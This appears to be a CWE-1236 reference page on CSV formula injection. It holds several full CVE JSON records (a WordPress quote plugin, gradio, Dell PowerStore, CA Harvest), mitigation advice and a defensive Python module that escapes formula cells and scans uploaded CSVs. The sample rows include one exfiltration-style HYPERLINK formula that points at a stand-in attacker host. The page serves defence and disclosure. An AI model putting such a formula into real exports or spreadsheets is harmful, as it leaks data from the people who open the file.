"name": "https://github.com/nocodb/nocodb/commit/079e3abe",
"refsource": "MISC",
"url": "https://github.com/nocodb/nocodb/commit/079e3abe"
},
{
"name": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2022-22121",
"refsource": "MISC",
"url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2022-22121"
}
]
},
"solution": [
{
"lang": "en",
"value": "Update to version 0.84.0 or later"
}
],
"source": {
"advisory": "https://www.whitesourcesoftware.com/vulnerability-database/",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "478c68dd-22c1-4a41-97cd-654224dfacff",
"assignerShortName": "Mend",
"cveId": "CVE-2022-22121",
"datePublished": "2022-01-10T15:25:28.528Z",
"dateReserved": "2021-12-21T00:00:00.000Z",
"dateUpdated": "2024-09-17T04:09:34.606Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-2240 (GCVE-0-2022-2240)
Vulnerability from cvelistv5 – Published: 2022-07-25 12:47 – Updated: 2024-08-03 00:32
Title
Request a Quote <= 2.3.7 - CSV Injection
Summary
The Request a Quote WordPress plugin through 2.3.7 does not validate uploaded CSV files, allowing unauthenticated users to attach a malicious CSV file to a quote, which could lead to CSV injection once an admin downloads and opens it.
Severity
No CVSS data available.
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://wpscan.com/vulnerability/6a3a573e-f9f2-45… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version |
|---|---|---|
| Unknown | Request a Quote | Affected: 2.3.7, ≤ 2.3.7 (custom) |
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:32:09.260Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://wpscan.com/vulnerability/6a3a573e-f9f2-45ec-9156-332cc551fc7e"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Request a Quote",
"vendor": "Unknown",
"versions": [
{
"lessThanOrEqual": "2.3.7",
"status": "affected",
"version": "2.3.7",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Benachi"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Request a Quote WordPress plugin through 2.3.7 does not validate uploaded CSV files, allowing unauthenticated users to attach a malicious CSV file to a quote, which could lead to a CSV injection once an admin download and open it"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-07-25T12:47:54.000Z",
"orgId": "1bfdd5d7-9bf6-4a53-96ea-42e2716d7a81",
"shortName": "WPScan"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://wpscan.com/vulnerability/6a3a573e-f9f2-45ec-9156-332cc551fc7e"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Request a Quote \u003c= 2.3.7 - CSV Injection",
"x_generator": "WPScan CVE Generator",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "contact@wpscan.com",
"ID": "CVE-2022-2240",
"STATE": "PUBLIC",
"TITLE": "Request a Quote \u003c= 2.3.7 - CSV Injection"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Request a Quote",
"version": {
"version_data": [
{
"version_affected": "\u003c=",
"version_name": "2.3.7",
"version_value": "2.3.7"
}
]
}
}
]
},
"vendor_name": "Unknown"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Benachi"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Request a Quote WordPress plugin through 2.3.7 does not validate uploaded CSV files, allowing unauthenticated users to attach a malicious CSV file to a quote, which could lead to a CSV injection once an admin download and open it"
}
]
},
"generator": "WPScan CVE Generator",
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://wpscan.com/vulnerability/6a3a573e-f9f2-45ec-9156-332cc551fc7e",
"refsource": "MISC",
"url": "https://wpscan.com/vulnerability/6a3a573e-f9f2-45ec-9156-332cc551fc7e"
}
]
},
"source": {
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "1bfdd5d7-9bf6-4a53-96ea-42e2716d7a81",
"assignerShortName": "WPScan",
"cveId": "CVE-2022-2240",
"datePublished": "2022-07-25T12:47:55.000Z",
"dateReserved": "2022-06-28T00:00:00.000Z",
"dateUpdated": "2024-08-03T00:32:09.260Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-22689 (GCVE-0-2022-22689)
Vulnerability from cvelistv5 – Published: 2022-02-04 22:29 – Updated: 2024-08-03 03:21
Summary
CA Harvest Software Change Manager versions 13.0.3, 13.0.4, 14.0.0, and 14.0.1, contain a vulnerability in the CSV export functionality, due to insufficient input validation, that can allow a privileged user to potentially execute arbitrary code or commands.
Severity
No CVSS data available.
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
ca
References
1 reference
| URL | Tags |
|---|---|
| https://support.broadcom.com/security-advisory/co… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| n/a | CA Harvest Software Change Manager | Affected: 13.0.3, 13.0.4, 14.0.0, 14.0.1 | |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T03:21:48.947Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://support.broadcom.com/security-advisory/content/security-advisories/CA20220203-01-Security-Notice-for-CA-Harvest-Software-Change-Manager/ESDSA20297"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "CA Harvest Software Change Manager",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "13.0.3, 13.0.4, 14.0.0, 14.0.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CA Harvest Software Change Manager versions 13.0.3, 13.0.4, 14.0.0, and 14.0.1, contain a vulnerability in the CSV export functionality, due to insufficient input validation, that can allow a privileged user to potentially execute arbitrary code or commands."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-02-04T22:29:27.000Z",
"orgId": "e291eae9-7c0a-46ac-ba7d-5251811f8b7f",
"shortName": "ca"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://support.broadcom.com/security-advisory/content/security-advisories/CA20220203-01-Security-Notice-for-CA-Harvest-Software-Change-Manager/ESDSA20297"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "vuln@ca.com",
"ID": "CVE-2022-22689",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "CA Harvest Software Change Manager",
"version": {
"version_data": [
{
"version_value": "13.0.3, 13.0.4, 14.0.0, 14.0.1"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "CA Harvest Software Change Manager versions 13.0.3, 13.0.4, 14.0.0, and 14.0.1, contain a vulnerability in the CSV export functionality, due to insufficient input validation, that can allow a privileged user to potentially execute arbitrary code or commands."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.broadcom.com/security-advisory/content/security-advisories/CA20220203-01-Security-Notice-for-CA-Harvest-Software-Change-Manager/ESDSA20297",
"refsource": "MISC",
"url": "https://support.broadcom.com/security-advisory/content/security-advisories/CA20220203-01-Security-Notice-for-CA-Harvest-Software-Change-Manager/ESDSA20297"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "e291eae9-7c0a-46ac-ba7d-5251811f8b7f",
"assignerShortName": "ca",
"cveId": "CVE-2022-22689",
"datePublished": "2022-02-04T22:29:27.000Z",
"dateReserved": "2022-01-05T00:00:00.000Z",
"dateUpdated": "2024-08-03T03:21:48.947Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-24770 (GCVE-0-2022-24770)
Vulnerability from cvelistv5 – Published: 2022-03-17 20:30 – Updated: 2025-04-23 18:46
Title
Improper Neutralization of Formula Elements in a CSV File in Gradio Flagging
Summary
`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer's computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user's computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs.
Severity
8.8 (High)
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
GitHub_M
References
3 references
| URL | Tags |
|---|---|
| https://github.com/gradio-app/gradio/security/adv… | x_refsource_CONFIRM |
| https://github.com/gradio-app/gradio/pull/817 | x_refsource_MISC |
| https://github.com/gradio-app/gradio/commit/80fea… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| gradio-app | gradio | Affected: < 2.8.11 | |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T04:20:50.502Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-f8xq-q7px-wg8c"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/gradio-app/gradio/pull/817"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/gradio-app/gradio/commit/80fea89117358ee105973453fdc402398ae20239"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-24770",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-23T15:55:02.672639Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-23T18:46:31.781Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "gradio",
"vendor": "gradio-app",
"versions": [
{
"status": "affected",
"version": "\u003c 2.8.11"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer\u0027s computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user\u0027s computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-03-17T20:30:19.000Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-f8xq-q7px-wg8c"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/gradio-app/gradio/pull/817"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/gradio-app/gradio/commit/80fea89117358ee105973453fdc402398ae20239"
}
],
"source": {
"advisory": "GHSA-f8xq-q7px-wg8c",
"discovery": "UNKNOWN"
},
"title": "Improper Neutralization of Formula Elements in a CSV File in Gradio Flagging",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2022-24770",
"STATE": "PUBLIC",
"TITLE": "Improper Neutralization of Formula Elements in a CSV File in Gradio Flagging"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "gradio",
"version": {
"version_data": [
{
"version_value": "\u003c 2.8.11"
}
]
}
}
]
},
"vendor_name": "gradio-app"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer\u0027s computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user\u0027s computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/gradio-app/gradio/security/advisories/GHSA-f8xq-q7px-wg8c",
"refsource": "CONFIRM",
"url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-f8xq-q7px-wg8c"
},
{
"name": "https://github.com/gradio-app/gradio/pull/817",
"refsource": "MISC",
"url": "https://github.com/gradio-app/gradio/pull/817"
},
{
"name": "https://github.com/gradio-app/gradio/commit/80fea89117358ee105973453fdc402398ae20239",
"refsource": "MISC",
"url": "https://github.com/gradio-app/gradio/commit/80fea89117358ee105973453fdc402398ae20239"
}
]
},
"source": {
"advisory": "GHSA-f8xq-q7px-wg8c",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2022-24770",
"datePublished": "2022-03-17T20:30:19.000Z",
"dateReserved": "2022-02-10T00:00:00.000Z",
"dateUpdated": "2025-04-23T18:46:31.781Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26867 (GCVE-0-2022-26867)
Vulnerability from cvelistv5 – Published: 2022-06-02 21:00 – Updated: 2024-09-16 17:03
Summary
PowerStore SW v2.1.1.0 supports the option to export data to either a CSV or an XLSX file. The data is taken as is, without any validation or sanitization. It allows a malicious, authenticated user to inject payloads that might get interpreted as formulas by the corresponding spreadsheet application that is being used to open the CSV/XLSX file.
Severity
5.9 (Medium)
CWE
- CWE-1236 - Improper Neutralization of Formula Elements in a CSV File
Assigner
dell
References
1 reference
| URL | Tags |
|---|---|
| https://www.dell.com/support/kbdoc/000196367 | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Dell | PowerStore | Affected: unspecified, < PowerStore SW v2.1.1.0 (custom) | |
Date Public
2022-04-19 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:18:38.118Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.dell.com/support/kbdoc/000196367"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "PowerStore",
"vendor": "Dell",
"versions": [
{
"lessThan": "PowerStore SW v2.1.1.0",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"datePublic": "2022-04-19T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "PowerStore SW v2.1.1.0 supports the option to export data to either a CSV or an XLSX file. The data is taken as is, without any validation or sanitization. It allows a malicious, authenticated user to inject payloads that might get interpreted as formulas by the corresponding spreadsheet application that is being used to open the CSV/XLSX file."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-06-02T21:00:25.000Z",
"orgId": "c550e75a-17ff-4988-97f0-544cde3820fe",
"shortName": "dell"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.dell.com/support/kbdoc/000196367"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secure@dell.com",
"DATE_PUBLIC": "2022-04-19",
"ID": "CVE-2022-26867",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "PowerStore",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "PowerStore SW v2.1.1.0"
}
]
}
}
]
},
"vendor_name": "Dell"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "PowerStore SW v2.1.1.0 supports the option to export data to either a CSV or an XLSX file. The data is taken as is, without any validation or sanitization. It allows a malicious, authenticated user to inject payloads that might get interpreted as formulas by the corresponding spreadsheet application that is being used to open the CSV/XLSX file."
}
]
},
"impact": {
"cvss": {
"baseScore": 5.9,
"baseSeverity": "Medium",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.dell.com/support/kbdoc/000196367",
"refsource": "MISC",
"url": "https://www.dell.com/support/kbdoc/000196367"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c550e75a-17ff-4988-97f0-544cde3820fe",
"assignerShortName": "dell",
"cveId": "CVE-2022-26867",
"datePublished": "2022-06-02T21:00:25.273Z",
"dateReserved": "2022-03-10T00:00:00.000Z",
"dateUpdated": "2024-09-16T17:03:58.884Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
Mitigation
Phase: Implementation
Description:
- When generating CSV output, ensure that formula-sensitive metacharacters are escaped or removed from every field before it is written to the resulting CSV. The risky leading characters are '=' (equals), '+' (plus), '-' (minus) and '@' (at); OWASP's CSV injection guidance also lists a leading tab (0x09) and carriage return (0x0D), which Excel treats the same way. Apply the check per field and quote every field, so that a delimiter or newline embedded in a value cannot start a new cell that begins with one of these characters.
Mitigation
Phase: Implementation
Description:
- If a field starts with a formula character, prefix it with a single apostrophe ('). Excel and other spreadsheet products then treat the cell as literal text instead of evaluating it; this is the approach the gradio 2.8.11 fix above takes. The apostrophe becomes part of the stored value and may be visible when the file is opened, so apply it only to fields that would otherwise be evaluated, and take care not to turn genuine negative numbers into text.
Mitigation
Phase: Architecture and Design
Description:
- Certain spreadsheet products refuse to evaluate formulas, or warn before doing so, when the file is untrusted or was not authored by the current user. That protection lives in the consumer's software and configuration, so a CSV producer cannot rely on it; treat it as defence in depth behind the escaping above.
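The following Python module is an added, runnable example written for this page; it is not code from CWE/MITRE, WPScan, gradio, Dell or CA. It applies the two implementation-phase mitigations above to an outbound export (the situation in the WP-CRM, gradio flagging, PowerStore and Harvest records: an apostrophe prefix on formula-like cells plus quoting of every field), and it also scans an inbound CSV for formula cells, which is the validation the Request a Quote record above says was missing for uploaded attachments. The trigger set extends the CWE's four characters with tab and carriage return from OWASP's CSV injection guidance. The function names, the keep_numbers option, the number regex and the sample rows are my own assumptions and constructions, not anything from the affected products.

```python
import csv
import io
import re

# Characters that make Excel, LibreOffice Calc and Google Sheets evaluate a
# cell when they appear first. '=', '+', '-', '@' are the four named in the
# CWE-1236 mitigation; tab (0x09) and carriage return (0x0D) are added from
# OWASP's CSV injection guidance, which lists them as triggers as well.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Plain numbers such as '-5' or '+3.2e1' are let through unchanged so that a
# real negative balance stays numeric (an assumption of this example, not a
# rule from the CWE; set keep_numbers=False to prefix those too).
_NUMBER = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def is_formula_like(cell: str, keep_numbers: bool = True) -> bool:
    """True if a spreadsheet would evaluate this cell instead of displaying it."""
    if keep_numbers and _NUMBER.match(cell):
        return False
    return cell.startswith(FORMULA_TRIGGERS)


def neutralize_field(value, keep_numbers: bool = True) -> str:
    """Return the cell as text a spreadsheet will show literally.

    Formula-like cells get a leading apostrophe, the same technique as the
    gradio 2.8.11 fix; everything else is returned as-is (None becomes "").
    """
    text = "" if value is None else str(value)
    if is_formula_like(text, keep_numbers):
        return "'" + text
    return text


def write_safe_csv(rows, header=None, keep_numbers: bool = True) -> str:
    """Serialize rows to CSV text with every cell neutralized and quoted.

    QUOTE_ALL matters: without it, a value containing a newline or the
    delimiter would be split by the spreadsheet into a new cell whose first
    character might be '=', bypassing the per-cell check above.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    if header is not None:
        writer.writerow([neutralize_field(h, keep_numbers) for h in header])
    for row in rows:
        writer.writerow([neutralize_field(c, keep_numbers) for c in row])
    return buf.getvalue()


def find_formula_cells(csv_text: str, keep_numbers: bool = True):
    """Scan an inbound CSV (an upload that staff will later open) and return
    (row, col, cell) for each cell a spreadsheet would evaluate as a formula.
    Reject or quarantine the upload when the result is non-empty."""
    hits = []
    reader = csv.reader(io.StringIO(csv_text, newline=""))
    for r, row in enumerate(reader, start=1):
        for c, cell in enumerate(row, start=1):
            if is_formula_like(cell, keep_numbers):
                hits.append((r, c, cell))
    return hits


if __name__ == "__main__":
    # Constructed sample rows, like a CRM "people" export: one visitor-supplied
    # name carries an exfiltration-style HYPERLINK formula, another row holds a
    # legitimate negative balance that must stay numeric.
    people = [
        ("Alice Example", "alice@example.com", -5),
        ('=HYPERLINK("http://attacker.invalid/?"&B2,"open me")', "mallory@example.com", 10),
        ("@SUM(1,1)", "bob@example.com", 0),
    ]
    print(write_safe_csv(people, header=["name", "email", "balance"]))

    # Constructed sample of an uploaded quote attachment, as in the Request a
    # Quote record: scan it before an administrator opens it in a spreadsheet.
    upload = "item,qty\r\n=1+1,1\r\nwidget,-2\r\n@SUM(A1:A2),3\r\n"
    for r, c, cell in find_formula_cells(upload):
        print(f"row {r} col {c}: formula-like cell {cell!r}")
```

The apostrophe becomes part of the cell and is shown by Excel and LibreOffice when the file is opened as CSV, so the export no longer round-trips byte-for-byte; that is the price of the second mitigation, and the numeric exemption keeps it from also corrupting real negative values. Quoting every field is what makes the per-cell check sufficient: an attacker who cannot break out of a quoted field cannot manufacture a new cell that starts with '='. The same neutralization applies to the string cells of an XLSX export such as PowerStore's.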
No CAPEC attack patterns related to this CWE.